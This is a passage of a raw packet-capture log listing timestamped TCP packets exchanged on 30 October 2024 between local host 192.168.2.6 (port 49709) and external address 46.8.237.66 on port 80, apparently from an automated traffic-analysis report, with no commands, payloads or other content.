                              Oct 30, 2024 20:19:04.392009974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392020941 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392031908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392071962 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.392404079 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392414093 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392424107 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392435074 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392461061 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.392498016 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.392677069 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392688990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392699003 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392709017 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392735958 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.392766953 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.392797947 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392848969 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.392873049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392884970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392895937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392927885 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.393135071 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393187046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393193960 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.393296957 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393307924 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393317938 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393357038 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.393410921 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.393553972 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393564939 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393574953 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393584013 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393615007 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.393645048 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.435966015 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.436054945 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.436064959 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.436157942 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.477036953 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.477118015 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.477128029 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.477154016 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.477195024 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511115074 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511172056 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511182070 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511226892 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511264086 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511276007 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511348009 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511420012 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511430025 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511440039 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511470079 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511502981 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511579037 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511590958 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511600018 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511632919 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511724949 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511733055 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511786938 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511814117 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511826992 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511873960 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511915922 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511926889 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511977911 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.512118101 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512181997 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512186050 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.512192965 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512240887 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.512331009 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512341976 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512351990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512392998 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.512474060 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512484074 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512505054 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512520075 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512527943 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.512559891 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.513026953 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.513036966 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.513046980 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.513057947 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.513083935 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.513113976 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.513114929 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.513164043 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.513191938 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.556149006 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.556201935 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.556335926 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.556792021 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.556876898 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.596801996 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.596883059 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.596893072 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.596967936 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.630733967 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.630800962 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.630805969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.630816936 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.630923033 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.630942106 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.630953074 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631087065 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631098986 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631098986 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631153107 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631155968 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631175041 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631231070 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631268024 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631278038 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631321907 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631347895 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631423950 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631434917 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631477118 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631494045 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631504059 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631546974 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631697893 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631747961 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631772995 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631782055 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631835938 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631999016 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632091999 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632102966 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632152081 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.632178068 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632189035 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632237911 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.632323027 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632333040 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632380962 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.632462025 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632473946 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632483959 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632493973 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632505894 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632536888 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.632592916 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.632747889 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632760048 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632770061 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632812023 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.675390005 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.675442934 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.675462008 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.675473928 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.675518990 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.675585985 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.675652027 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.675709009 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.716430902 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.716449022 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.716458082 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.716505051 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.716526031 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.716573954 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.750250101 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750260115 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750300884 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750360966 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.750391960 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750401974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750411987 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750447989 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.750487089 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.750554085 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750658989 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750668049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750715971 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750722885 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.750726938 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750768900 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.750952959 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750965118 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750974894 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751033068 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751034021 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751066923 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751211882 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751223087 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751233101 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751240969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751269102 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751302004 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751441002 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751492977 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751503944 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751513958 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751563072 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751593113 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751650095 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751658916 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751701117 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751888990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751899958 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751950979 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751987934 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752000093 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752043009 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752047062 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.752096891 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.752139091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752202988 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752213001 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752223969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752254963 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.752289057 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.752392054 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752403021 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752413034 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752417088 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752485037 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.794907093 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.794961929 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.794971943 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.795056105 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.795087099 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.795099020 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.795109987 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.795156002 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.795192003 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.835999012 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.836047888 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.836057901 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.836208105 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.870060921 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870107889 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870117903 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870210886 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.870258093 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.870294094 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870304108 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870357990 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.870400906 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870412111 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870477915 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.870615959 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870626926 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870635986 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870670080 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.870771885 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870784044 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870793104 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870822906 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.870853901 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.871068001 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.871077061 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.871085882 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.871097088 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.871135950 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.871135950 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.871277094 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.871287107 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.871296883 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.871306896 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.871328115 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.871337891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.871347904 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.871361971 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.871361971 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.871414900 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.871702909 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.871761084 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.871798992 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.871809959 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.871853113 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.872019053 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.872029066 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.872039080 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.872049093 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.872060061 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.872071028 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.872102976 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.872340918 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.872351885 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.872363091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.872370958 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.872399092 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.872437000 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.872572899 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.872582912 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.872592926 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.872636080 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.872667074 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.914475918 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.914504051 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.914513111 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.914589882 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.914629936 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.914640903 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.914652109 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.914691925 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.914743900 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.914782047 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.955785990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.955842018 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.955852032 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.955900908 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.956137896 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.989589930 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.989608049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.989615917 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.989742994 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.989763021 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.989773989 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.989784002 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.989794016 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.989819050 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.989850998 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.990010977 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990060091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990068913 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.990098953 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990151882 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.990225077 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990236044 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990247011 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990278006 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.990389109 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990441084 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.990467072 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990478039 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990530968 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.990609884 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990727901 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990736961 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990747929 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990756989 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990767002 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.990777016 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.990807056 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.990839005 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.990984917 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991043091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991086006 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.991152048 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991163969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991173983 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991194010 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.991375923 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991386890 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991419077 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.991523027 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991532087 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991539955 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991574049 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.991605997 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.991739988 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991750956 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991760969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991771936 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991781950 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.991791964 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.991792917 CET804970946.8.237.66192.168.2.6
